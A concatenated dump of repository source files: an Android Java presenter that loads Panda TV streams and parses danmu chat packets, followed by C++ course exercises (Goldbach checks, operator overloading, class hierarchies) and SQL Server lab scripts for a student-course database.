this.end_time = end_time;
}
public String getRoom_type() {
return room_type;
}
public void setRoom_type(String room_type) {
this.room_type = room_type;
}
public String getStatus() {
return status;
}
public void setStatus(String status) {
this.status = status;
}
/** Wrapper for the room cover picture URL. */
public static class PicturesEntity {
/**
 * img : http://i5.pdim.gs/90/f1428c8c77436b26a808c7ff4989f6c3/w338/h190.jpg
 */
private String img; // cover image URL
public String getImg() {
return img;
}
public void setImg(String img) {
this.img = img;
}
}
}
/**
 * Video section of the room response: the playable HLS (.m3u8) address and a
 * watermark flag, both as raw strings.
 */
public static class VideoinfoEntity {
/**
 * address : http://pl-hls3.live.panda.tv/live_panda/7d9bdfd8beca4be796bc4b757503decd_small.m3u8
 * watermark : 1
 */
private String address; // HLS stream URL
private String watermark;
public String getAddress() {
return address;
}
public void setAddress(String address) {
this.address = address;
}
public String getWatermark() {
return watermark;
}
public void setWatermark(String watermark) {
this.watermark = watermark;
}
}
}
}
<file_sep>/app/src/main/java/io/playcode/streambox/ui/pandastream/PandaStreamPresenter.java
package io.playcode.streambox.ui.pandastream;
import android.text.TextUtils;
import com.blankj.aloglibrary.ALog;
import com.google.gson.Gson;
import com.koushikdutta.async.AsyncServer;
import com.koushikdutta.async.Util;
import com.koushikdutta.async.future.Cancellable;
import org.greenrobot.eventbus.EventBus;
import org.reactivestreams.Publisher;
import org.reactivestreams.Subscription;
import io.playcode.streambox.data.bean.PandaDanmuEntity;
import io.playcode.streambox.data.bean.PandaStreamDanmuServerEntity;
import io.playcode.streambox.data.bean.PandaStreamEntity;
import io.playcode.streambox.data.bean.StreamInfoEntity;
import io.playcode.streambox.data.source.AppRepository;
import io.playcode.streambox.event.PandaDanmuEvent;
import io.playcode.streambox.event.StreamInfoEvent;
import io.playcode.streambox.util.PandaDanmuUtil;
import io.reactivex.BackpressureStrategy;
import io.reactivex.Flowable;
import io.reactivex.FlowableOnSubscribe;
import io.reactivex.FlowableSubscriber;
import io.reactivex.Observer;
import io.reactivex.android.schedulers.AndroidSchedulers;
import io.reactivex.annotations.NonNull;
import io.reactivex.disposables.CompositeDisposable;
import io.reactivex.disposables.Disposable;
import io.reactivex.functions.Function;
import io.reactivex.schedulers.Schedulers;
import io.reactivex.subscribers.DefaultSubscriber;
/**
* Created by anpoz on 2017/4/14.
*/
/**
 * Presenter for the Panda TV live-stream screen: loads the room/stream info,
 * posts it on the EventBus, connects the danmu (bullet-comment) chat socket
 * and forwards each parsed danmu as a {@link PandaDanmuEvent}.
 *
 * Review fixes:
 * 1. unSubscribe() no longer throws an NPE when it runs before the danmu
 *    socket was ever connected (mCancellable is only assigned inside
 *    connectDanmuSocket(), which is reached asynchronously).
 * 2. parseDanmu() no longer emits onNext() after onComplete(); the original
 *    fell through after signalling completion, which violates the Reactive
 *    Streams emitter contract.
 */
public class PandaStreamPresenter implements PandaStreamContract.Presenter {
    private PandaStreamContract.View mView;
    private CompositeDisposable mCompositeDisposable;
    private String roomId;
    private String address;
    private Cancellable mCancellable; // danmu socket handle; null until connected

    public PandaStreamPresenter(PandaStreamContract.View view) {
        mView = view;
        mView.setPresenter(this);
        mCompositeDisposable = new CompositeDisposable();
    }

    @Override
    public void subscribe() {
    }

    @Override
    public void unSubscribe() {
        mCompositeDisposable.clear();
        // Fix: guard against unSubscribe() running before the socket existed.
        if (mCancellable != null) {
            mCancellable.cancel();
        }
        EventBus.getDefault().removeStickyEvent(PandaDanmuEvent.class);
    }

    @Override
    public void setRoomId(String id) {
        roomId = id;
        ALog.d(id);
        // Load room + video info, repackage it as the app-wide stream info
        // event, and hand the playback address to the view.
        AppRepository.getInstance()
                .getPandaStreamRoom(roomId)
                .subscribeOn(Schedulers.io())
                .observeOn(AndroidSchedulers.mainThread())
                .subscribe(new Observer<PandaStreamEntity>() {
                    @Override
                    public void onSubscribe(Disposable d) {
                        mCompositeDisposable.add(d);
                    }

                    @Override
                    public void onNext(PandaStreamEntity pandaStreamEntity) {
                        address = pandaStreamEntity.getData().getVideoinfo().getAddress();
                        StreamInfoEntity infoEntity = new StreamInfoEntity();
                        infoEntity.setLive_id(pandaStreamEntity.getData().getRoominfo().getId());
                        infoEntity.setLive_img(pandaStreamEntity.getData().getHostinfo().getAvatar());
                        infoEntity.setLive_nickname(pandaStreamEntity.getData().getHostinfo().getName());
                        infoEntity.setLive_title(pandaStreamEntity.getData().getRoominfo().getName());
                        infoEntity.setLive_online(pandaStreamEntity.getData().getRoominfo().getPerson_num());
                        infoEntity.setPush_time(pandaStreamEntity.getData().getRoominfo().getStart_time());
                        infoEntity.setLive_type("pandatv");
                        EventBus.getDefault().postSticky(new StreamInfoEvent(infoEntity));
                        mView.updateStreamAddress(address, pandaStreamEntity.getData().getRoominfo().getName());
                    }

                    @Override
                    public void onError(Throwable e) {
                        e.printStackTrace();
                    }

                    @Override
                    public void onComplete() {
                    }
                });
        // Resolve the chat server list, then open the danmu socket.
        AppRepository.getInstance()
                .getPandaDanmuServer(id)
                .subscribeOn(Schedulers.io())
                .observeOn(AndroidSchedulers.mainThread())
                .subscribe(new Observer<PandaStreamDanmuServerEntity>() {
                    @Override
                    public void onSubscribe(Disposable d) {
                        mCompositeDisposable.add(d);
                    }

                    @Override
                    public void onNext(PandaStreamDanmuServerEntity pandaStreamDanmuServerEntity) {
                        connectDanmuSocket(pandaStreamDanmuServerEntity);
                    }

                    @Override
                    public void onError(Throwable e) {
                        e.printStackTrace();
                    }

                    @Override
                    public void onComplete() {
                    }
                });
    }

    /**
     * Connects to the first chat server ("host:port") in the list, sends the
     * handshake and registers a callback that parses every received packet.
     */
    private void connectDanmuSocket(PandaStreamDanmuServerEntity danmuServerEntity) {
        String[] address = danmuServerEntity.getData().getChat_addr_list().get(0).split(":");
        mCancellable = AsyncServer.getDefault().connectSocket(address[0], Integer.valueOf(address[1]), (ex, socket) ->
                Util.writeAll(socket, PandaDanmuUtil.getConnectData(danmuServerEntity.getData()), ex1 -> {
                    socket.setDataCallback((emitter, bb) ->
                            parseDanmu(bb.getAllByteArray()));
                }));
    }

    /**
     * Extracts up to two danmu JSON payloads from a raw socket packet,
     * deserializes them and posts each as a PandaDanmuEvent.
     * NOTE(review): the substring extraction assumes every RECEIVE_MSG packet
     * contains at least one "{\"type...}}" payload; confirm against the
     * protocol before hardening the index handling.
     */
    private void parseDanmu(byte[] data) {
        Flowable.create((FlowableOnSubscribe<String>) e -> {
            // Danmu protocol header
            if (data[0] == PandaDanmuUtil.RECEIVE_MSG[0] &&
                    data[1] == PandaDanmuUtil.RECEIVE_MSG[1] &&
                    data[2] == PandaDanmuUtil.RECEIVE_MSG[2] &&
                    data[3] == PandaDanmuUtil.RECEIVE_MSG[3]) {
                // Example payload:
                // {"type":"1","time":1477356608,"data":{"from":{...},"to":{"toroom":"15161"},"content":"我去"}}
                String content = new String(data, "UTF-8");
                // First danmu
                int danmuFromIndex = content.indexOf("{\"type");
                int danmuToIndex = content.indexOf("}}");
                // Second danmu (optional)
                int danmuFromIndex_2 = content.lastIndexOf("{\"type");
                int danmuToIndex_2 = content.lastIndexOf("}}");
                String danmu; // holds the extracted danmu JSON
                danmu = content.substring(danmuFromIndex, danmuToIndex + 2);
                if (TextUtils.isEmpty(danmu)) { // nothing to emit
                    e.onComplete();
                    return; // fix: never emit after completion
                }
                e.onNext(danmu);
                // If a second danmu is present
                if (!(danmuFromIndex == danmuFromIndex_2 &&
                        danmuToIndex == danmuToIndex_2)) {
                    danmu = content.substring(danmuFromIndex_2, danmuToIndex_2 + 2);
                    if (TextUtils.isEmpty(danmu)) {
                        e.onComplete();
                        return; // fix: never emit after completion
                    }
                    e.onNext(danmu);
                }
                e.onComplete();
            } else if (data[0] == PandaDanmuUtil.HEART_BEAT_RESPONSE[0] && // heartbeat packet
                    data[1] == PandaDanmuUtil.HEART_BEAT_RESPONSE[1] &&
                    data[2] == PandaDanmuUtil.HEART_BEAT_RESPONSE[2] &&
                    data[3] == PandaDanmuUtil.HEART_BEAT_RESPONSE[3]) {
                e.onComplete();
            }
        }, BackpressureStrategy.DROP)
                .flatMap(new Function<String, Publisher<PandaDanmuEntity>>() {
                    @Override
                    public Publisher<PandaDanmuEntity> apply(@NonNull String s) throws Exception {
                        return Flowable.create(e -> {
                            // Deserialize the danmu JSON
                            PandaDanmuEntity danmu = new Gson().fromJson(s, PandaDanmuEntity.class);
                            e.onNext(danmu);
                            e.onComplete();
                        }, BackpressureStrategy.BUFFER);
                    }
                })
                .subscribeOn(Schedulers.io())
                .subscribe(new FlowableSubscriber<PandaDanmuEntity>() {
                    @Override
                    public void onSubscribe(@NonNull Subscription s) {
                        s.request(10);
                    }

                    @Override
                    public void onNext(PandaDanmuEntity danmuEntity) {
                        EventBus.getDefault().post(new PandaDanmuEvent(danmuEntity));
                    }

                    @Override
                    public void onError(Throwable t) {
                        t.printStackTrace();
                    }

                    @Override
                    public void onComplete() {
                    }
                });
    }
}
| f139d32357699cea55a49f14f92f06c36306d0a4 | [
"Java"
] | 2 | Java | ly774508966/StreamBox | c16a1bc03a2b0b2ff9764ff0c03cd5a7a375ec05 | 695831228ea973551c42cfe6d7e7a1880956f278 |
refs/heads/master | <repo_name>FnEsc/Course-Code<file_sep>/CPlus_Source/Chapter4/4_4.h
#pragma once
#include<iostream>
using namespace std;
// Returns true iff x is a prime number.
// Fix: the original reported every x < 2 (0, 1 and all negatives) as prime,
// because the trial-division loop body never runs for those values.
bool is_prime(int x) {
	if (x < 2) {
		return false;
	}
	for (int i = 2; i <= x / 2; i++) {
		if (x % i == 0) {
			return false;
		}
	}
	return true;
}
// Interactive demo: verifies Goldbach's conjecture (every even number >= 4
// is the sum of two primes) over a user-supplied range of even numbers.
void main_4_4() {
int a, b;
cout << "输入两个偶数(2起),范围内证明哥德巴赫猜想:";
cin >> a >> b;
// Normalise the range so min <= max regardless of input order.
int min = a >= b ? b : a;
int max = a >= b ? a : b;
bool flag;
// Step through the even numbers of the range.
for (int i = min; i <= max; i += 2) {
flag = 0; // becomes 1 once a prime pair is found for i
for (int j = 2; j < i; j++) {
if (is_prime(j) && (is_prime(i - j))) {
cout << i << "=" << j << "+" << i - j << endl;
flag = 1;
break; // first decomposition is enough
}
}
if (!flag)
{
// No decomposition found -- would disprove the conjecture.
cout << "???" << endl;
};
}
}
<file_sep>/CPlus_Source/Shiyan3/main_1.h
#pragma once
int main_1();<file_sep>/CPlus_Source/Shiyan4/Employee.h
#pragma once
#include"Person.h"
#include<iostream>
// Salaried employee: a Person with a fixed monthly salary of 10000.
class Employee:public Person
{
public:
Employee(int id0, const char* name0); // an Employee needs an id and a name
~Employee();
virtual void calculation(); // sets the fixed salary
virtual void display(); // prints id, name and salary
private:
};
Employee::Employee(int id0, const char* name0) {
id = id0;
strcpy_s(name, name0);
}
Employee::~Employee()
{
}
// Fixed salary for regular employees.
void Employee::calculation() {
salary = 10000;
}
void Employee::display() {
std::cout << "这个id为" << id << "名字为" << name << "的工资是:" << salary << std::endl;
}
#pragma once
#include<iostream>
using namespace std;
// Demo of overloading operator<< as a friend so a T can be streamed to cout.
class T {
int x, y;
public:
T(int a, int b) { x = a; y = b; }
// friend so the inserter can read the private members
friend ostream & operator<<(ostream &os, T &a);
};
// Return type is ostream& so insertions can be chained (cout << a << endl).
ostream& operator<<(ostream &os, T &a)
{
os << "x=" << a.x << " y=" << a.y;
return os;
}
void main_4_2()
{
T a(1, 2);
cout << a << endl; // uses the overloaded inserter
}
<file_sep>/CPlus_Source/Shiyan2/box.h
#pragma once
#include<iostream>
#include<windows.h>
using namespace std;
// Rectangular box: reads its dimensions, computes and prints its volume.
class Box
{
private:
double length, width, height, volume;
public:
// Read length, width and height from standard input.
void setProperty() {
cout << "请依次输入长方柱的长、宽、高(用空格分开):";
cin >> length >> width >> height;
}
// volume = length * width * height (call after setProperty()).
void V_calculation() {
volume = length * width*height;
}
// Print the computed volume.
void V_output() {
cout << "计算出的长方柱的体积为:" << volume << endl;
}
};
int main_box();
<file_sep>/CPlus_Source/Shiyan2/const_text.h
#pragma once
#include <iostream>
using namespace std;
// Demo class for const-overload resolution: a const object calls
// print() const, a non-const object calls the non-const print().
class R
{
public:
R(int r1 = 0) : R1(r1) {};
void print(); // chosen for non-const objects
void print() const; // chosen for const objects
private:
int R1;
};
int main_const_text();
<file_sep>/CPlus_Source/Shiyan3/3_3.h
#pragma once
#include<iostream>
#include"birthday.h"
using namespace std;
// Interactive demo: reads a student's name, id, score and birthday, then
// displays them via the Date and Student classes from birthday.h.
int main_3_3()
{
char n[50]; // student name buffer
int i, s, y, m, d; // id, score, year, month, day
cout << "请输入学生姓名: ";
cin >> n;
cout << "请输入学生学号和成绩: ";
cin >> i >> s;
cout << "请输入学生的生日: ";
cin >> y >> m >> d;
Date d1(y, m, d);
d1.display();
Student s1(i, s, n); // Student's Person base prints the name
s1.display();
return 0;
}
<file_sep>/SQL_SERVER_Experiment/README.md
# SQL SERVER experiment
Fosu University Course SQL SERVER Code Source
佛山科学技术学院 SQL课程实验源代码
# How to use
Clone this repository and paste the scripts into a SQL Server query console.
<file_sep>/CPlus_Source/Chapter1/1_2.h
#pragma once
#include<iostream>
using namespace std;
// Reads positive observations until a non-positive value is entered, then
// prints how many were given and their average.
// Fixes: (1) the average was computed and printed even when count == 0,
// which divides zero by zero; it is now printed only when data was entered.
// (2) "Your did not" message typo corrected to "You did not".
int main_1_2() {
	int count;
	float obs, sum;
	cout << "Type your observation." << endl;
	cout << "Type 0 after the last!" << endl;
	count = 0;
	sum = 0;
	cin >> obs;
	while (obs > 0) {
		sum += obs;
		count++;
		cin >> obs;
	}
	if (count == 0) {
		cout << "You did not write any observations!" << endl;
	}
	else {
		cout << "Number of observation given:" << count << endl;
		cout << "Average value:" << sum / count << endl;
	}
	return 0;
}
<file_sep>/SQL_SERVER_Experiment/shiyan_4.sql
-- Experiment 4: INSERT / UPDATE / DELETE on the xskc sample database.
use xskc
-- Insert with an explicit column list (column order may differ from the table).
INSERT INTO Student(Sno,Sname,Ssex,Sdept,Sage) VALUES('200215128','陈冬','男','IS',18);
-- Insert relying on the table's own column order.
INSERT INTO Student VALUES('200215129','陈冬','男',18,'IS');
-- Enrolment without a grade yet.
INSERT INTO SC(Sno,Cno) VALUES('200215128','1');
UPDATE Student SET Sage=31 WHERE Sno='200215129'
SELECT * FROM Student
-- Unconditional update: everyone gets one year older.
UPDATE Student SET Sage = Sage+1
-- Correlated-subquery update: zero the grades of CS-department students.
UPDATE SC SET Grade=0 WHERE 'CS' = (SELECT Sdept FROM Student WHERE Student.Sno=SC.Sno)
-- Delete the enrolments first so the student row can be removed (FK order).
DELETE FROM SC WHERE Sno='200215128'
DELETE FROM Student WHERE Sno='200215128'
SELECT * FROM Student
SELECT * FROM SC
-- Delete every row of SC.
DELETE FROM SC
DELETE FROM SC WHERE 'CS'=(SELECT Sdept FROM Student WHERE Student.Sno=SC.Sno) -- delete the enrolment records of every CS-department student
-- Archive table with the same structure as Student.
CREATE TABLE History_Student(
Sno CHAR(9) PRIMARY KEY,
Sname CHAR(8) NOT NULL,
Ssex CHAR(2) DEFAULT '男' CHECK(Ssex in ('男','女')),
Sage INT,
Sdept CHAR(20)
);
-- Copy all current students into the archive.
INSERT INTO History_Student SELECT * FROM Student;
SELECT * FROM History_Student
--END实验<file_sep>/CPlus_Source/Chapter4/4_5.h
#pragma once
#include<iostream>
#include<stdlib.h>
using namespace std;
// Demo of rand() and of a static local variable's lifetime.
void main_4_5() {
cout << rand() % 52 + 1 << "\t" << rand() % 52 + 1 << "\t" << rand() % 52 + 1 << endl; // three pseudo-random numbers in 1..52 (no srand(), so the same sequence every run)
for (int i = 0; i < 10; i++) {
static int z = 0; // without static: prints 0000000000; with static: 0123456789
cout << z;
z++;
//i = 9; // (commented out) this would change the loop variable and end the loop early
}
}
<file_sep>/CPlus_Source/Shiyan4/Person.h
#pragma once
// Abstract base class for all payroll person types. Derived classes must
// implement calculation() (compute salary) and display() (print the result).
class Person
{
public:
Person();
~Person();
virtual void calculation()=0; // pure: compute this person's salary
virtual void display()=0; // pure: print id, name and salary
protected:
int id;
char name[15];
float salary=0; // in-class initialiser: salary starts at 0
};
Person::Person()
{
}
Person::~Person()
{
}
<file_sep>/CPlus_Source/Chapter2/max_3.h
#pragma once
#include<iostream>
using namespace std;
// Reads three numbers and prints the largest of them (no trailing newline,
// matching the original output exactly).
int main_3() {
	float a, b, c;
	cin >> a >> b >> c;
	float largest = (a > b) ? a : b;
	if (c > largest) {
		largest = c;
	}
	cout << largest;
	return 0;
}
<file_sep>/CPlus_Source/Shiyan4/shape.h
#pragma once
// shape.h文件 定义抽象基类Shape
// Guard fix: the original wrote "#ifndef Shape" with no matching #define, so
// the guard never took effect -- and defining a macro literally named "Shape"
// would have clashed with the class name. Use a distinct guard symbol;
// the #pragma once above remains in force as well.
#ifndef SHAPE_H_GUARD
#define SHAPE_H_GUARD
// Abstract base class for printable shapes.
class Shape
{
public:
	// Default area; concrete shapes override this.
	virtual double Area() const
	{
		return 0.0;
	}
	// Pure virtual functions, overridden in derived classes.
	virtual void PrintShapeName() const = 0;
	virtual void Print() const = 0;
};
#endif // SHAPE_H_GUARD
<file_sep>/CPlus_Source/Chapter3/3_2_8.h
#pragma once
#include<iostream>
using namespace std;
// Menu demo: read a choice and report it via switch/case.
// Fix: the prompt string was GBK-encoded Chinese saved as mojibake
// ("Çë×ö³öÑ¡Ôñ£º"); restored to the intended text, matching the identical
// menu in Chapter3/3_3_2.h.
void main_3_2_8() {
	int choice;
	std::cout << "请做出选择:" << std::endl << "1.Apple" << std::endl << "2.Banana" << std::endl;
	std::cin >> choice;
	switch (choice)
	{
	case 1:std::cout << "You choose Apple" << std::endl; break;
	case 2:std::cout << "You choose Banana" << std::endl; break;
	default:
		std::cout << "You choose what???" << std::endl;
		break;
	}
}
#pragma once
#include<iostream>
using namespace std;
// Reads two integers and swaps them via a temporary variable.
int main_swap(){
int a, b, t;
cout << "学号:20160310321\t" << "学生:林上满" << endl;
cout << "请输入两个数(用空格分开):";
cin >> a >> b;
t = a; // three-step swap through the temporary t
a = b;
b = t;
cout << "交换后两个数分别是:" << a << " " << b << endl;
return 0;
}
<file_sep>/CPlus_Source/Shiyan4/cixu.h
#pragma once
#include <iostream>
using namespace std;
// Teaching demo for constructor/destructor ordering: B contains two A
// members (a, b) besides inheriting from A, so constructing a B runs the
// base A ctor, then the member ctors in declaration order, then B's ctor;
// destruction runs in exact reverse.
// NOTE(review): A() prints the literal 1 while leaving x uninitialised, and
// B() prints y before initialising it -- the values printed by those paths
// (and by ~A for default-constructed As) are indeterminate. Presumably
// intentional for the demo; confirm before "fixing".
class A
{
public:
A()
{
cout << "Constructor1_A" << 1 << endl;
}
A(int m) : x(m)
{
cout << "Constructor2_A" << x << endl;
}
~A()
{
cout << "Destructor_A" << x << endl;
}
private:
int x;
};
class B : public A
{
public:
B()
{
cout << "Constructor1_B" << y << endl;
}
// Initialiser list order does not matter: members are constructed in
// declaration order (a before b), and the base A is constructed first.
B(int m, int n, int x, int T) : b(n), a(x), y(T)
{
cout << "Constructor2_B" << y << endl;
}
~B()
{
cout << "Destructor_B" << y << endl;
}
private:
int y;
A a;
A b;
};
int main_cixu()
{
// Note: the base A is default-constructed here (no A(m) in the list).
B b2(5, 6, 7, 8);
return 0;
}
<file_sep>/CPlus_Source/Chapter5/single.h
#pragma once
#include<iostream>
using namespace std;
// Demo of a static data member used as an instance counter: warns when more
// than one object of the class exists at the same time.
class SINGLE_INSTANCE
{
public:
SINGLE_INSTANCE();
~SINGLE_INSTANCE();
private:
static int instance_count; // number of live instances (shared by all objects)
};
SINGLE_INSTANCE::SINGLE_INSTANCE()
{
instance_count += 1;
if (instance_count > 1)cout << "Warning: more than one object instance!" << endl;
return;
}
SINGLE_INSTANCE::~SINGLE_INSTANCE()
{
instance_count -= 1;
return;
}
int SINGLE_INSTANCE::instance_count = 0;// define and initialise the static data member
void main_single() {
// create the first object -- no warning
cout << "I HAVE THE FIRST OBJECT." << endl;
SINGLE_INSTANCE obj1;
// create the second object -- triggers the warning
cout << "I HAVE THE SECOND OBJECT." << endl;
SINGLE_INSTANCE obj2;
return;
}
#include"pch.h"
#include "person_2.h"
// Default constructor: placeholder name "XXX", age 0, sex code 0 (male).
Person_2::Person_2() : m_nAge(0), m_nSex(0)// constructor
{
strcpy_s(m_strName, "XXX");
}
// Sex is stored as an int code: 0 for 'm', 1 otherwise.
Person_2::Person_2(const char *name, int age, char sex) : m_nAge(age), m_nSex(sex == 'm' ? 0 : 1)// constructor
{
strcpy_s(m_strName, name);
}
Person_2::Person_2(const Person_2 &p) : m_nAge(p.m_nAge), m_nSex(p.m_nSex)// copy constructor
{
strcpy_s(m_strName, p.m_strName);
}
void Person_2::SetName(const char *name)
{
strcpy_s(m_strName, name);
}
void Person_2::SetAge(int age)
{
m_nAge = age;
}
void Person_2::setSex(char sex)
{
m_nSex = sex == 'm' ? 0 : 1;
}
char* Person_2::GetName()
{
return m_strName;
}
int Person_2::GetAge()
{
return m_nAge;
}
// Decode the stored int back to a character ('m' or 'f').
char Person_2::GetSex()
{
return (m_nSex == 0 ? 'm' : 'f');
}
void Person_2::ShowPerson_2()
{
cout << GetName() << '\t' << GetAge() << '\t' << GetSex() << endl;
}
// Demo: heap-allocated objects, member-wise assignment, explicit delete.
int main_person_2() {
Person_2 *p1, *p2; // two pointers to objects
p1 = new Person_2; // dynamically create a Person_2 (default ctor)
cout << "person1: \t";
p1->ShowPerson_2();
p1->SetAge(19);
cout << "person1: \t";
p1->ShowPerson_2();
p2 = new Person_2("Zhang3", 19, 'm'); // dynamically create an initialised Person_2
cout << "person2: \t";
p2->ShowPerson_2();
*p2 = *p1; // object-to-object (member-wise) assignment
cout << "person2: \t";
p2->ShowPerson_2();
delete p1; // release the object p1 points to
delete p2; // release the object p2 points to
return 0;
}
#pragma once
#include <iostream>
#include <cstring>
using namespace std;
// Base person record: name, age, and sex stored as an int code (0 = 'm',
// 1 = 'f'); base class for Employee in this experiment.
class Person
{
private:
char m_strName[20];
int m_nAge;
int m_nSex; // 0 for male, 1 for female
public:
Person();// default constructor
Person(const char *name, int age, char sex); // initialising constructor
Person(const Person &p); // copy constructor
~Person() // destructor (traces destruction order)
{
cout << "Now destroying the instance of Person" << endl;
}
void SetName(char *name);
void SetAge(int age);
void setSex(char sex);
char* GetName();
int GetAge();
char GetSex();
void ShowMe(); // print name, age and sex
};
<file_sep>/CPlus_Source/Chapter1/1_4_2.h
#pragma once
#include<iostream>
using namespace std;
// Prints the area of a rectangle.
// Fix: the output string contained the typo "面基" for "面积" (area).
// NOTE(review): 78 + 42 is a *sum* labelled as an area in square metres;
// the intended expression is presumably 78 * 42 -- confirm against the
// textbook exercise before changing the arithmetic.
int main_1_4_2() {
	cout << "矩形的面积是:" << 78 + 42 << "平方米" << endl;
	return 0;
}
#pragma once
#include <iostream>
using namespace std;
// Minimal complex-number class demonstrating operator overloading.
// Review fixes (behaviour of the demo is unchanged):
//  - operator= now returns COMPLEX& (the canonical copy-assignment form),
//    so chained assignment operates on the object, not on a temporary copy.
//  - The arithmetic operators and print() are now const member functions,
//    so they work on const operands.
class COMPLEX {
public:
	COMPLEX(double r = 0, double i = 0); // constructor
	COMPLEX(const COMPLEX& other); // copy constructor
	void print() const; // print the number as "a", "a+bi" or "a-bi"
	COMPLEX operator +(const COMPLEX& other) const; // binary addition
	COMPLEX operator -(const COMPLEX& other) const; // binary subtraction
	COMPLEX operator -() const; // unary negation
	COMPLEX& operator =(const COMPLEX& other); // assignment
protected:
	double real, image; // real and imaginary parts
};
COMPLEX::COMPLEX(double r, double i)
{
	real = r;
	image = i;
}
COMPLEX::COMPLEX(const COMPLEX& other)
{
	real = other.real;
	image = other.image;
}
void COMPLEX::print() const
{
	cout << real;
	if (image > 0)cout << "+" << image << "i";
	else if (image < 0)cout << image << "i";
	cout << endl;
}
COMPLEX COMPLEX::operator +(const COMPLEX& other) const
{
	COMPLEX temp;
	temp.real = real + other.real;
	temp.image = image + other.image;
	return temp;
}
COMPLEX COMPLEX::operator -(const COMPLEX& other) const
{
	COMPLEX temp;
	temp.real = real - other.real;
	temp.image = image - other.image;
	return temp;
}
COMPLEX COMPLEX::operator -() const
{
	COMPLEX temp;
	temp.real = -real;
	temp.image = -image;
	return temp;
}
COMPLEX& COMPLEX::operator =(const COMPLEX& other)
{
	real = other.real;
	image = other.image;
	return *this; // return the assigned-to object (enables chaining)
}
int main_4_1()
{
	COMPLEX c1(1, 2); // c1 = 1 + 2i
	COMPLEX c2(2); // c2 = 2
	//c2.print();
	COMPLEX c3(c1); // copy-construct c3 with c1's value
	c3.print(); // print c3's original value
	c1 = c1 + c2 + c3; // c1 = c1 + c2 + c3
	c2 = -c3; // c2 = -c3
	c3 = c2 - c1; // c3 = c2 - c1
	c3.print(); // print c3 after the arithmetic
	//cout<<sizeof(c1)<<endl;
	return 0;
}
<file_sep>/SQL_SERVER_Experiment/shiyan_1.sql
-- Experiment 1: create the xskc database, its tables and indexes.
-- Create the target folder for the data files on disk first.
CREATE DATABASE xskc
on (name=xsks_data,filename='F:\SQL_SERVER\sjksy\xskc_data.mdf')
log on (name=xskc_log,filename='F:\SQL_SERVER\sjksy\xskc_log.ldf');
-- Alternative: attach existing data/log files as a new database.
EXEC sp_attach_db @dbname = 'xskc',
@filename1 = 'F:\SQL_SERVER\sjksy\xskc_data.mdf',
@filename2 = 'F:\SQL_SERVER\sjksy\xskc_log.ldf'
-- END attach
USE xskc;
-- Students: primary key Sno, sex restricted to 男/女 with default 男.
CREATE TABLE Student(
Sno CHAR(9) PRIMARY KEY,
Sname CHAR(8) NOT NULL,
Ssex CHAR(2) DEFAULT '男' CHECK(Ssex in ('男','女')),
Sage INT,
Sdept CHAR(20)
);
-- Courses: Cpno is a self-referencing FK (prerequisite course).
CREATE TABLE Course(
Cno CHAR(4) PRIMARY KEY,
Cname CHAR(40) NOT NULL,
Cpno CHAR(4),
Ccredit INT,
FOREIGN KEY(Cpno) REFERENCES Course(Cno)
);
-- Enrolments: composite key (Sno, Cno) referencing both parent tables.
CREATE TABLE SC(
Sno CHAR(9),
Cno CHAR(4),
Grade INT,
PRIMARY KEY(Sno,Cno),
FOREIGN KEY(Sno) REFERENCES Student(Sno),
FOREIGN KEY(Cno) REFERENCES Course(Cno)
);
-- ALTER TABLE exercises: add, retype, constrain, then drop a column.
ALTER TABLE Student ADD S_entrance DATETIME;
ALTER TABLE Student ALTER COLUMN Sage SMALLINT;
ALTER TABLE Course ADD UNIQUE(Cname);
ALTER TABLE Student ALTER COLUMN Sdept CHAR(20) NOT NULL;
ALTER TABLE Student DROP COLUMN S_entrance;
-- DROP TABLE Student CASCADE; -- NOTE: cascading DROP TABLE fails on SQL Server
-- CREATE CLUSTERED INDEX Stu_Sname ON Student(Sage); -- NOTE: CLUSTERED = clustered index; a table cannot have more than one
-- DROP INDEX PK__Student__CA1FE4647F60ED59 ON Student; -- NOTE: explicit DROP INDEX is not allowed on 'Student.PK__Student__CA1FE4647F60ED59' -- the index enforces the PRIMARY KEY constraint
-- ALTER TABLE Student ALTER COLUMN Sno char(9) not null; -- NOTE: dropping/retyping the primary key column fails
CREATE UNIQUE INDEX Stu_Sno ON Student(Sno);
CREATE UNIQUE INDEX Cou_Cno ON Course(Cno);
CREATE UNIQUE INDEX SCno ON SC(Sno ASC,Cno DESC);
-- DROP INDEX Stu_Sname ON Student; -- NOTE: the clustered index above was never created
-- END Experiment 1
<file_sep>/CPlus_Source/Chapter3/3_3.h
#pragma once
#include<iostream>
#include<cmath>
using namespace std;
// Prints all three-digit narcissistic ("water-flower") numbers, i.e. numbers
// equal to the sum of the cubes of their digits: 153 370 371 407.
// Fix: the original compared pow()'s double result against an int with ==;
// floating-point pow can return e.g. 124.999999..., making the exact
// comparison fragile. Pure integer arithmetic is exact and faster.
void main_3_3() {
	for (int i = 100; i < 1000; i++) {
		int h = i / 100;        // hundreds digit
		int t = (i / 10) % 10;  // tens digit
		int u = i % 10;         // units digit
		if (h * h * h + t * t * t + u * u * u == i) {
			cout << i << endl;
		}
	}
}
<file_sep>/SQL_SERVER_Experiment/shiyan_3.sql
-- Experiment 3: joins, subqueries, EXISTS and set operations.
USE xskc;
-- Equi-join of students with their enrolments.
SELECT Student.*,SC.* FROM Student,SC WHERE Student.Sno=SC.Sno;
SELECT Student.Sno, Sname, Ssex, Sage, Sdept, Cno, Grade FROM Student,SC WHERE Student.Sno=SC.Sno;
SELECT A.Cno,A.Cname,B.Cpno FROM Course A, Course B -- this is a Cartesian product, which is not what we want
SELECT A.Cno,A.Cname,B.Cpno FROM Course A, Course B WHERE A.Cpno=B.Cno -- self-join via table aliases
SELECT Student.Sno,Sname,Ssex,Sdept,Cno,Grade FROM Student,SC WHERE Student.Sno=SC.Sno;
SELECT Student.Sno,Sname,Ssex,Sdept,Cno,Grade FROM Student LEFT JOIN SC ON Student.Sno=SC.Sno; -- students with no enrolment still appear, via the LEFT JOIN
SELECT Student.Sno,Sname,Ssex,Sdept,Cno,Grade FROM SC RIGHT JOIN Student ON Student.Sno=SC.Sno; -- same result as above; only which side is preserved differs
SELECT Student.Sno,Sname,Cname,Grade FROM Student,SC,Course WHERE Student.Sno=SC.Sno AND SC.Cno=Course.Cno; -- three-table join
-- Students in the same department as 李勇 (IN subquery).
SELECT Sno,Sname,Sdept
FROM Student
WHERE Sdept IN
(SELECT Sdept FROM Student WHERE Sname='李勇')
-- Same query with = (valid because the subquery returns a single value).
SELECT Sno , Sname, Sdept
FROM Student
WHERE Sdept =
(SELECT Sdept
FROM Student
WHERE Sname='李勇');
-- Same query rewritten as a self-join.
